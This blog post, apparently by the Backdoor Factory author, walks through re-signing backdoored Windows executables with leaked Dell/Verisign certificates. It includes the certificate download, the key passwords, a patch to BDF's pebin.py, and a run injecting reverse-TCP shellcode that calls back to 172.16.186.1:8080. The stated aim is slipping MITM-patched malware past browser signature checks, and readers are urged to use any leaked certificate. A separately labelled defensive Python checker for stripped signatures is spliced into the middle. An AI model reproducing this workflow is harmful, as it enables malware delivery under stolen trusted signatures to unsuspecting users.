Add PE Code Signing to Backdoor Factory (BDF)

Let's say you want to add PE code signing to your instance of BDF after you patch PE files. It's really easy. But to be honest, it's something I will not officially support in BDF for various reasons at the moment. One of them: I don't want to ship signing certs with BDF. Perhaps I'll release a pro version where I implement everything, or I'll teach a class and include stuff like this. Or I'll just tell you below.

Why would you want code signing in BDF?

Internet browsers, like IE/Edge, give a pass if the binary is signed (A/V is another story). So if a signed binary is delivered via HTTP, MITM'ed, stripped of its signature, patched, then re-signed with a valid cert, a browser like IE should be OK with it. Since BDF is part of BDFProxy, even better, right?

Cool, ready to add code signing to BDF?

First things first, you need some signing certs.

The kind folks at Duo Security did some great research; read it here.

Grab the certs here.

Now, BDF runs great on *nix/OSX, so we need something that does PE code signing on Linux.

Grab osslsigncode like so:

$ git clone git://git.code.sf.net/p/osslsigncode/osslsigncode osslsigncode

To build:

$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

Next we need the signing certs, and we need to put them in the BDF directory.

Navigate to your BDF home directory.

the-backdoor-factory git:(master) $
$ curl -O https://www.duosecurity.com/static/files/DellCertificates.zip
$ mkdir certs
$ unzip DellCertificates.zip -d certs

$ tree certs
certs
├── Verisign.pass
├── Verisign.pfx
├── __MACOSX
├── eDellRoot.cer
└── eDellRootLocalhost.cer

Let's use the Verisign cert.

We'll need to convert the PFX to PEM (the .cer file written below is PEM-encoded), as that is what osslsigncode prefers.

$ openssl pkcs12 -in certs/Verisign.pfx -out certs/Verisign.cer -nodes
Enter Import Password: t-span

OK.

Now we need to extract the private key from the PFX (it gets its own PEM passphrase, which osslsigncode is given with -pass later).

$ openssl pkcs12 -in certs/Verisign.pfx -nocerts -out certs/VerisignPrivateKey.pem
Enter Import Password: t-span
MAC verified OK
Enter PEM pass phrase: moomoo
Verifying - Enter PEM pass phrase: moomoo

Let's test everything out:

$ curl -O http://live.sysinternals.com/tcpview.exe  # yay http

$ osslsigncode extract-signature -in tcpview.exe -out sig.txt

$ hexdump -C sig.txt

And you should see something like this: http://pastebin.com/My9UHyjS
Clearly from Microsoft!

Test run:

$ osslsigncode -certs certs/Verisign.cer -key certs/VerisignPrivateKey.pem -n "Securitay" -in tcpview.exe -out tcpview_signed.exe -pass moomoo
Succeeded

$ osslsigncode extract-signature -in tcpview_signed.exe -out sig1.txt

$ hexdump -C sig1.txt

And you should see something like this: http://pastebin.com/BSEzgS5q
Clearly not from Microsoft!

And if you upload to VirusTotal you'll see the signature is fully signed in the 'Signers' section and not by MS: https://www.virustotal.com/en/file/65b06e906b17c9f164937826575fc45f4c5f152ef8abfc324368eb46bb0028dc/analysis/1450316795/
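Added example, not code from the post or from BDF: the defender's side of the check just done with extract-signature and hexdump. It reads the PE security data directory, reports whether the certificate table pointer has been zeroed (the step BDF logs as "Overwriting certificate table pointer"), and lists the commonName strings inside the embedded PKCS#7 blob so a downloaded binary can be compared against the publisher it was expected to carry. build_sample_pe and its CN values are constructed test data, and the CN scan is a heuristic, not a full ASN.1 parse.

```python
import struct

SECURITY_DIR_INDEX = 4                 # IMAGE_DIRECTORY_ENTRY_SECURITY
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002
CN_OID = b"\x06\x03\x55\x04\x03"       # DER-encoded OID 2.5.4.3 (commonName)

def certificate_table(pe):
    """Return (file_offset, size) of the Authenticode table; (0, 0) if the pointer is zeroed."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                            # skip the COFF file header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic not in (0x10B, 0x20B):                    # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    count_off = opt + (92 if magic == 0x10B else 108)  # NumberOfRvaAndSizes
    if struct.unpack_from("<I", pe, count_off)[0] <= SECURITY_DIR_INDEX:
        return (0, 0)
    # Unlike the other directories, this one holds a raw file offset, not an RVA.
    return struct.unpack_from("<II", pe, count_off + 4 + 8 * SECURITY_DIR_INDEX)

def signer_common_names(pe):
    """Collect commonName strings from the embedded PKCS#7 blob (issuer and subject CNs).
    Lightweight DER scan, not a full ASN.1 parser: OID 2.5.4.3 + string, short-form lengths only."""
    off, size = certificate_table(pe)
    if size == 0:
        return []
    length, _revision, cert_type = struct.unpack_from("<IHH", pe, off)
    if cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA or length > size:
        raise ValueError("unexpected WIN_CERTIFICATE header")
    blob, names, pos = pe[off + 8:off + length], [], 0
    while (pos := blob.find(CN_OID, pos)) != -1 and pos + 7 <= len(blob):
        tag, ln = blob[pos + 5], blob[pos + 6]
        if tag in (0x0C, 0x13) and ln < 0x80:          # UTF8String / PrintableString
            names.append(blob[pos + 7:pos + 7 + ln].decode())
        pos += 1
    return names

def build_sample_pe(cns):
    """Constructed minimal PE32 with a fake certificate table; test data, not a real signature."""
    blob = b"".join(CN_OID + b"\x13" + bytes([len(c)]) + c.encode() for c in cns)
    cert = struct.pack("<IHH", 8 + len(blob), 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + blob
    dirs = [(0, 0)] * SECURITY_DIR_INDEX + [(0x200, len(cert))] + [(0, 0)] * 11
    opt = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    hdr = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 20 + opt
    return hdr.ljust(0x200, b"\0") + cert
```

On a real download, pass the file's bytes to signer_common_names and compare the result with the publisher you expected; an empty list means the certificate table has been removed.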

Your certs directory should now look like so:
$ tree certs
certs
├── Verisign.cer
├── Verisign.pass
├── Verisign.pfx
├── VerisignPrivateKey.pem
├── __MACOSX
├── eDellRoot.cer
└── eDellRootLocalhost.cer

Time to modify BDF source code!!

Open pebin.py in your favorite editor.

Navigate to the bottom of the "def patch_pe(self):" function.

Near the bottom of that function we will modify...

...with the following code (pebin.py needs `import subprocess` at the top if it is not already there)...

        if self.ZERO_CERT is True:
            # the original certificate table was removed earlier; re-sign the patched file in place
            p = subprocess.Popen(['osslsigncode', '-certs', 'certs/Verisign.cer',
                                  '-key', 'certs/VerisignPrivateKey.pem', '-n', 'Security',
                                  '-in', self.flItms["backdoorfile"],
                                  '-out', self.flItms["backdoorfile"], '-pass', 'moomoo'])
            p.wait()

... so it looks like this afterwards:


After this mod to BDF, you should see the following after running a similar command:

./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -H 172.16.186.1 -P 8080 -m automatic
__________                __       .___                   
\______   \_____    ____ |  | __ __| _/____   ___________ 
 |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \ 
 |    |   \ / __ \\  \___|    </ /_/ (  <_> |  <_> )  | \/
 |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|   
        \/      \/     \/     \/    \/                    
___________              __                               
\_   _____/____    _____/  |_  ___________ ___.__.        
 |    __) \__  \ _/ ___\   __\/  _ \_  __ <   |  |        
 |     \   / __ \\  \___|  | (  <_> )  | \/\___  |        
 \___  /  (____  /\___  >__|  \____/|__|   / ____|        
     \/        \/     \/                   \/             

         Author:    Joshua Pitts
         Email:     the.midnite.runr[-at ]gmail<d o-t>com
         Twitter:   @midnite_runr
         IRC:       freenode.net #BDFactory
         
         Version:   3.2.4
         
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Gathering file info
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 87
[*] All caves lengths:  145, 162, 87
[*] Attempting PE File Automatic Patching
[!] Selected: 50: Section Name: .data; Cave begin: 0x44cc5 End: 0x44d6b; Cave Size: 166; Payload Size: 162
[!] Selected: 32: Section Name: .text; Cave begin: 0x3a304 End: 0x3a399; Cave Size: 149; Payload Size: 145
[!] Selected: 45: Section Name: .rdata; Cave begin: 0x3fba0 End: 0x3fc46; Cave Size: 166; Payload Size: 87
[*] Changing flags for section: .rdata
[*] Changing flags for section: .text
[*] Changing flags for section: .data
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
Succeeded
File tcpview.exe is in the 'backdoored' directory

Note the 'Succeeded'.

As expected, here's the result with a valid signature from Atheros:

This can be done with any PE code signing cert that has been released or leaked to the public. Get creative! If you think this should be part of BDF, let me know on Twitter or GitHub.

Cheers.
